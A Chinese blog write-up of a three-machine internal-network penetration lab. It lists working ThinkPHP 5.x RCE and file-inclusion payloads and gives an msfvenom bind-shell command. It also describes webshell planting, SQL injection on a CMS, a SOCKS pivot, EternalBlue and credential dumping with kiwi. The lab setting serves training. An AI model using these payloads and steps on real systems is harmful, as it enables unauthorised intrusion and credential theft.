内网渗透基础实验

一、靶场环境:

大体就是这环境,用Vmware创建三台虚拟机。ip地址随意配,只要保证能区分即可。

环境下载链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com

由于我这边vmware出了点小问题,自定义设置网络的时候老是提示正在加载虚拟网络,这样即使开机了ip地址也是不对的。故我采用的是强行修改配置文件的方式,直接用vs修改.vmx文件来实现网络分配。

二、正文:

一、Centos:

可以看到是v5.0的thinkphp,这种靶场大概率给我们准备了一个RCE漏洞,因为如果不是RCE则利用起来较为麻烦。

我们翻一下相关的关于ThinkPHP关于V5.0的漏洞文档来找突破点。

本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生。漏洞影响版本:5.0.7<=ThinkPHP5<=5.0.22、5.1.0<=ThinkPHP<=5.1.30。不同版本 payload 需稍作调整:

5.1.x:

?s=index/\think\Request/input&filter[]=system&data=pwd

?s=index/\think\view\driver\Php/display&content=<<?php phpinfo();?>>

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<<?php phpinfo();

?>>

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x:

?s=index/think/config/get&name=database.username # 获取配置信息

?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件

?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

这里我们用

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id来尝试一下,发现能正常执行,这就是我们的第一台服务器的突破口了。

同时如果被禁了,还可以用文件包含,file_put_contents这些来尝试。

尝试写一个phpinfo,能正常访问,这样直接写一个webshll远程连接即可。

这里我们直接写一个一句话木马:

再用蚁剑连接:

我们拿到权限之后,ifconfig发现有两张网卡。在这里我们就可以考虑用msf或fscan来扫描一下环境来发掘可利用点。

这里我们采用msf生成一个后门文件:

再将生成的木马上传上去:

之后我们再会到kali上做好监听准备工作:

再回到centos那台主机上./msfshell.elf文件

成功监听。至此MSF后门也准备好了,这为我们深层次的入侵做好了准备。

一、fscan内网扫描:

我们通过蚁剑上传一个fscan,执行fscan扫描192.168.232.0/24网段,从而发掘有用信息。

从图中我们可以看到232.128 和232.129都有80端口,当然129的那个我们已经知道了 ,是centos的,232.128将是我们更深层次入侵的突破点。

二、通过msf代理,用nmap进行扫描:

目的与fscan相同,但我们尝试一下不同的方式。

随后我们再通过msf建立一个代理服务器:启动一个 SOCKS5 代理服务器,用于将你本地的网络流量通过被攻破的内网主机进行转发。这样我们的kali也可以连接到ubuntu上了。

通过proxychains 连接创建的msf代理来进行扫描。

当然这扫描速度感人。故我们一般还是采用fscan来扫描。

四、Ubuntu:

访问该地址,通过返回结果判断出部署了web服务。

(访问之前先登陆宝塔设置一下,把web的ip改成现ubuntu的ip,因为我们的ip设置和原作者不一样,否则访问的时候就没有界面了)

那么我现在的目标就是拿下这个八哥CMS作为我们吓一跳的跳板。

查看网页源码我们可以发现,我们的靶场搭建人相当贴心,已经提前把注入点告诉我们了。

在这之前我们也可以找找该网站的登陆窗口。

我们可以用目录爆破的方式,也可以用robots的方式来找。

这里我们直接用作者提供的注入点进行注入。(由于我这里msf抽风了,这里就用截图代替了QAQ)

表名这里我们是直接猜的,当然这是一个开源的cms,它的数据库叫什么名字也很容易知道。

知道admin的密码之后就随便拿一个在线网站进行解密即可。

解密之后admin密码为123qwe。

登进去之后我们就得找一个能让我们上传webshell的地方了,最终我们在模板管理位置找到了非常合适的写入点,因为它是加载页面的,故一定会执行。

访问该界面,出现了我们之前写入的"oupeng",故证明一句话木马已经加载进服务器了。

我们之后再用蚁剑连接即可。

至此我们拿下了第二个服务器。

但我们写木马的时候就得有些改动了,不向centos用的反弹木马,这个就得用正向木马,因为ubuntu它反弹也找不到kali机,没有去kali的路由。

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=12345 -f elf > shell.elf

生成正向木马,在把这个木马上传上去,步骤和第一个一样。

msf监听:

五、win7

经过扫描,我们会得到win7虚拟机的地址。大概率是叫我们用永痕之蓝漏洞。

这里我们主要是用前两个永恒之蓝漏洞。

从结果看确实是用的445端口作为突破口。

用永恒之蓝拿下基本上就是最高权限,在用kiwi,基本上很容易的就能拿到账号密码。

这里直接用了个本地端口转发方便后续以桌面的形式远程连接。

至此win7也通过远程桌面的方式连接上。

这样三台主机都成功拿下。

相关推荐
@@123456胡斌2 小时前
SQL的整理及复现
数据库·sql·安全
吉普赛的歌2 小时前
【服务器】为安全考虑,已锁定该用户帐户,原因是登录尝试或密码更。改尝试过多。请稍候片刻再重试,或与系统管理员或技术支持联系。
运维·服务器·安全
点点开心2 小时前
攻防世界WEB(新手模式)2-5-web2
前端·学习·安全·web安全·网络安全
七夜zippoe2 小时前
网络安全实战:从TLS/SSL到JWT与OAuth2.0的完整防御体系构建
网络·安全·web安全·ssl·tls
梵得儿SHI2 小时前
(第九篇)Spring AI 核心技术攻坚:安全防护 企业级 AI 应用的风控体系之全链路防护(API 安全到内容合规)
java·人工智能·安全·spring·安全防护·springai·企业级ai
Bypass--3 小时前
攻击篇 | 云原生安全攻防实战
安全·云原生
智慧化智能化数字化方案3 小时前
向华为学习——解读华为云安全白皮书 2025【附全文阅读】
学习·安全·华为云·华为云安全白皮书
毕设源码-赖学姐11 小时前
【开题答辩全过程】以 高校学科竞赛管理系统安全开发为例,包含答辩的问题和答案
安全
麦聪聊数据11 小时前
智慧医疗数据互联互通:使用 QuickAPI 构建实时诊疗数据交换层
数据库·sql·安全